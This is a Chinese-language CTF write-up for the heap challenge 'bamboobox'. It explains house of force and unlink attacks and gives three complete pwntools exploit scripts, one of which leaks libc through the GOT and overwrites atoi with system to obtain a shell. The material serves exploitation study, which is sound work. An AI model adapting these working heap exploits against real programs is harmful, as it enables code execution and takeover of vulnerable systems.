这题是很久之前做的,这里简单记录一下。
有两种做法:一种是 house of force,另一种是 unlink attack。两种做法都依赖同一个漏洞:修改(edit/modify)功能允许指定一个比原分配更大的长度,从而造成堆溢出。
house of force 的原理是:先利用堆溢出把 top chunk 的 size 字段改成一个很大的值(这里是 0xffffffffffffffff),让 malloc 认为 top chunk 里总有足够空间;然后请求一个精心计算的(可以是负数)大小,使 top chunk 指针移动到我们想要写入的地址,下一次 malloc 返回的就是那个地址。这题的目标就在堆上,所以不需要泄露堆地址,只要算出 top chunk 到堆起始位置的距离即可。注意:glibc 2.29 起 malloc 会检查 top chunk 的 size 是否超过 system_mem(报 "malloc(): corrupted top size"),这种做法在新版本 libc 上已经失效。
利用 unlink 时,其实就是对即将被 unlink 的 chunk 进行内存布局:在可控区域伪造一个 chunk,把它的 fd/bk 分别指向"保存着该 chunk 指针的全局变量"的前 0x18 和前 0x10 字节处,使 glibc 的 FD->bk == P 且 BK->fd == P 检查通过;然后借助 free 时与前一个(低地址)chunk 的合并触发 unlink,最终把那个全局指针改写为 ptr - 0x18。前提是程序把 chunk 指针存在已知地址(这里是无 PIE 的 .bss 中的 0x6020c8),并且堆溢出能覆盖到相邻 chunk 的 prev_size/size。另外在 glibc 2.26 及以后,0x90 大小的 chunk 被 free 时会先进 tcache 而不会合并,需要先填满对应的 tcache bin 才能触发。
直接上脚本了
house_of_force:
from pwn import *

# Show every byte exchanged with the target; handy while calibrating offsets.
context.log_level = 'debug'

p = process('./test')
elf = ELF('./test')
# Address of magic() straight from the symbol table.  It is written raw into
# memory below (p64(magic)), so this assumes a non-PIE build.
magic = elf.symbols['magic']
def add(length, content):
    """Menu option 2: allocate an item of `length` bytes holding `content`.

    Each prompt is drained with a bare recv() before answering.  recv()
    returns whatever happens to be buffered, so this can desynchronise if a
    prompt arrives in two pieces; recvuntil() on the prompt text is sturdier.
    """
    for answer in ('2', str(length), content):
        p.recv()
        p.sendline(answer)
def show():
    """Menu option 1: list the stored items (unused by the exploit below)."""
    choice = '1'
    p.recv()
    p.sendline(choice)
def change(idx, length, content):
    """Menu option 3: rewrite item `idx` with `length` bytes of `content`.

    This is the vulnerable primitive: the exploit passes a `length` larger
    than the item's original allocation and the write lands past the chunk
    into the top chunk header (so the program evidently does not bound it).
    """
    for answer in ('3', str(idx), str(length), content):
        p.recv()
        p.sendline(answer)
def delete(idx):
    """Menu option 4: free item `idx` (unused by the exploit below)."""
    for answer in ('4', str(idx)):
        p.recv()
        p.sendline(answer)
def exit():
    """Menu option 5: quit the program.

    Presumably this is what invokes the pointers overwritten below (the
    exploit leaves sending '5' to the interactive session).  NOTE: the name
    shadows the builtin exit(); kept as-is so existing callers keep working.
    """
    choice = '5'
    p.recv()
    p.sendline(choice)
# --- house of force ---------------------------------------------------------
# 1. Get a chunk we control.  A 0x40-byte request is served from a 0x50-byte
#    chunk that sits directly below the top chunk.
add(0x40, 'aaaa')

# 2. Overflow past our 0x40 bytes into the top chunk header: 8 bytes of
#    prev_size, then size = 0xffffffffffffffff.  A huge top size satisfies
#    malloc's "enough room left in top" test for any request, which is the
#    whole trick (glibc >= 2.29 refuses a top size larger than system_mem,
#    so this only works on older libcs).
top_size = 0xffffffffffffffff
overflow = 'a' * 0x40 + p64(0) + p64(top_size)
change(0, len(overflow), overflow)
# gdb.attach(p); pause()   # uncomment to inspect the heap at this point

# 3. Move top backwards.  The top chunk currently lies 0x20 + 0x50 bytes past
#    the start of the heap (a 0x20 chunk the program allocated first -
#    presumably the struct holding the two pointers we overwrite in step 4,
#    confirm in the binary - followed by our 0x50 chunk).  A request of
#    -0x70 - 0x10 = -0x80 is rounded by malloc to a -0x70 chunk, so after the
#    split the new top sits exactly at the heap start.  The size is sent as a
#    negative decimal string and reinterpreted as a huge size_t.
distance = -(0x50 + 0x20)
wrap_size = distance - 0x10
add(wrap_size, 'bbbb')
pause()

# 4. The next allocation is carved from the relocated top, i.e. from the very
#    first heap chunk; fill its 0x10 bytes of user data with two copies of
#    magic's address, then pick option 5 in the interactive session.
add(0x10, p64(magic) * 2)

print p.recv()
p.interactive()
unlink attack: getshell 版
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

p = process('./bamboobox')
elf = ELF('./bamboobox')
# .bss slot that stores item 0's content pointer.  The unlink below rewrites
# this slot, so it has to be a fixed address (non-PIE binary).
ptr = 0x6020c8
# Not used by the getshell variant; kept for parity with the magic() variant.
magic = 0x400D49
puts = elf.got['puts']
def additem(length, name):
    """Menu option 2: create an item of `length` bytes named `name`."""
    for answer in ("2", str(length), name):
        p.recvuntil(":")
        p.sendline(answer)
def modify(idx, length, name):
    """Menu option 3: rewrite item `idx` with `length` bytes of `name`.

    The exploit relies on the program not bounding `length` by the item's
    original allocation - that overflow is what corrupts the next chunk's
    header.  Note that sendline() appends '\\n', so `length` + 1 bytes are
    actually sent.
    """
    for answer in ("3", str(idx), str(length), name):
        p.recvuntil(":")
        p.sendline(answer)
def remove(idx):
    """Menu option 4: free item `idx`; this is what triggers the unlink."""
    for answer in ("4", str(idx)):
        p.recvuntil(":")
        p.sendline(answer)
def show():
    """Menu option 1: print every item; used below to leak a GOT entry."""
    choice = "1"
    p.recvuntil(":")
    p.sendline(choice)
# --- unlink attack, getshell variant ----------------------------------------
# Items 0 and 1 are the victim pair (0x90-byte chunks, i.e. above the fastbin
# limit so free() will consolidate); item 2 is presumably a guard that keeps
# item 1 away from the top chunk.
additem(0x80, "a" * 8)
additem(0x80, "b" * 8)
additem(0x40, "c" * 8)

# Fake chunk laid out inside item 0's user data (whose address is the value
# stored at `ptr`):
#   prev_size = 0, size = 0x80
#   fd = ptr - 0x18, bk = ptr - 0x10  -> FD->bk and BK->fd both equal *ptr,
#                                        so glibc's unlink sanity check passes
# then padding to 0x80 bytes, and - overflowing into item 1's header -
#   prev_size = 0x80 (distance back to the fake chunk; must equal its size)
#   size      = 0x90 with PREV_INUSE clear, so free(1) consolidates backwards.
fake_chunk = p64(0) + p64(0x80) + p64(ptr - 0x18) + p64(ptr - 0x10)
fake_chunk += 'a' * (0x80 - 32)
fake_chunk += p64(0x80) + p64(0x80 + 0x10)
modify(0, 0x90, fake_chunk)      # 0x90 > 0x80: the overflow is the bug

# Consolidation unlinks the fake chunk: *ptr becomes ptr - 0x18, so item 0's
# content pointer now points into the item table itself.
remove(1)

# Writing item 0 now rewrites the table: 16 bytes of filler, then item 0's
# length (0x80) and its pointer, which we aim at atoi@got.
payload = p64(0) * 2 + p64(0x80) + p64(elf.got['atoi'])
modify(0, 0x80, payload)

# show() prints the contents of the GOT slot, leaking atoi's libc address.
# Only the first 6 bytes are kept; reading up to ":" breaks if the leaked
# address itself contains a 0x3a byte.
show()
p.recvuntil("0 : ")
raw_leak = p.recvuntil(":")[:6]
atoi = u64(raw_leak.ljust(8, "\x00"))

# These offsets belong to the libc the challenge was solved on (they look
# like a glibc 2.23 build); recompute them for any other libc, e.g. from
# ELF('libc.so.6').symbols.
libc_base = atoi - 0x36e80
print "libc:",hex(libc_base)
system = libc_base + 0x45390

# atoi@got -> system.  The menu choice is parsed with atoi, so sending "$0"
# ends up as system("$0") and drops into a shell.  modify() sends 8 bytes plus
# '\n'; whether that newline reaches the next GOT slot or stays in stdin
# depends on the program's read size - verify in the binary.
modify(0, 0x8, p64(system))
p.recvuntil(":")
p.sendline("$0")
p.interactive()
调用 magic 版:这里我修改了源文件并重新编译,把 magic 函数中 open 的文件路径改成了 ./flag。下面脚本里 magic = 0x400D49 是重新编译后二进制里的地址,换了二进制需要重新取(例如 elf.symbols['magic'])。
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

p = process('./bamboobox')
elf = ELF('./bamboobox')
# .bss slot holding item 0's content pointer; the unlink rewrites it (non-PIE).
ptr = 0x6020c8
# magic() in the recompiled binary (opens ./flag, per the note above).
# Hard-coded: re-read it from the ELF if the binary is rebuilt again.
magic = 0x400D49
puts = elf.got['puts']           # not used by this variant
context.arch = elf.arch          # so p64()/u64() match the target's word size
# context.terminal = ['tmux', 'splitw', '-h']   # for gdb.attach()
context.log_level = 'debug'
def add(length, name):
    """Menu option 2: create an item of `length` bytes named `name`."""
    for answer in ("2", str(length), name):
        p.recvuntil(":")
        p.sendline(answer)
def edit(idx, length, name):
    """Menu option 3: rewrite item `idx` with `length` bytes of `name`.

    The length prompt is matched on its full text rather than a bare ":".
    The exploit relies on the program not bounding `length` by the item's
    original allocation.  sendline() appends '\\n', so `length` + 1 bytes
    are actually sent.
    """
    steps = (
        (":", "3"),
        (":", str(idx)),
        ("Please enter the length of item name:", str(length)),
        (":", name),
    )
    for prompt, answer in steps:
        p.recvuntil(prompt)
        p.sendline(answer)
def delete(idx):
    """Menu option 4: free item `idx`; this is what triggers the unlink."""
    for answer in ("4", str(idx)):
        p.recvuntil(":")
        p.sendline(answer)
def show():
    """Menu option 1: print every item (unused by this variant)."""
    choice = "1"
    p.recvuntil(":")
    p.sendline(choice)
# --- unlink attack, magic() variant -----------------------------------------
add(0x80, "a" * 8)
add(0x80, "b" * 8)
add(0x40, "c" * 8)

# Same fake chunk as in the getshell variant: fd/bk are chosen so the unlink
# check passes via `ptr`, and the tail overflows item 1's prev_size/size so
# that free(1) consolidates backwards and unlinks the fake chunk, leaving
# *ptr == ptr - 0x18.
fake_chunk = p64(0) + p64(0x80) + p64(ptr - 0x18) + p64(ptr - 0x10)
fake_chunk += 'a' * (0x80 - 32)
fake_chunk += p64(0x80) + p64(0x80 + 0x10)
edit(0, 0x90, fake_chunk)        # 0x90 > 0x80: the overflow is the bug
delete(1)

# Item 0 now writes over the item table.  Rebuild two entries:
#   item 0: length 0x80, pointer ptr - 0x18 (keeps pointing at the table)
#   item 1: length 0x80, pointer atoi@got
payload = '\x00' * 0x10
payload += p64(0x80) + p64(ptr - 0x18)
payload += p64(0x80) + p64(elf.got['atoi'])
edit(0, 0x80, payload)

# Writing item 1 now writes atoi@got.  The length is 0x10 but only 8 bytes
# plus sendline's '\n' are supplied; that newline presumably ends up in the
# low byte of the GOT entry after atoi.  It worked here, but sizing the write
# to exactly what is sent (and checking the read size in the binary) is the
# safer choice.  The next menu choice ('5') goes through atoi, which is now
# magic(), so magic() runs and reads ./flag.
edit(1, 0x10, p64(magic))
p.recv()
p.sendline('5')
p.interactive()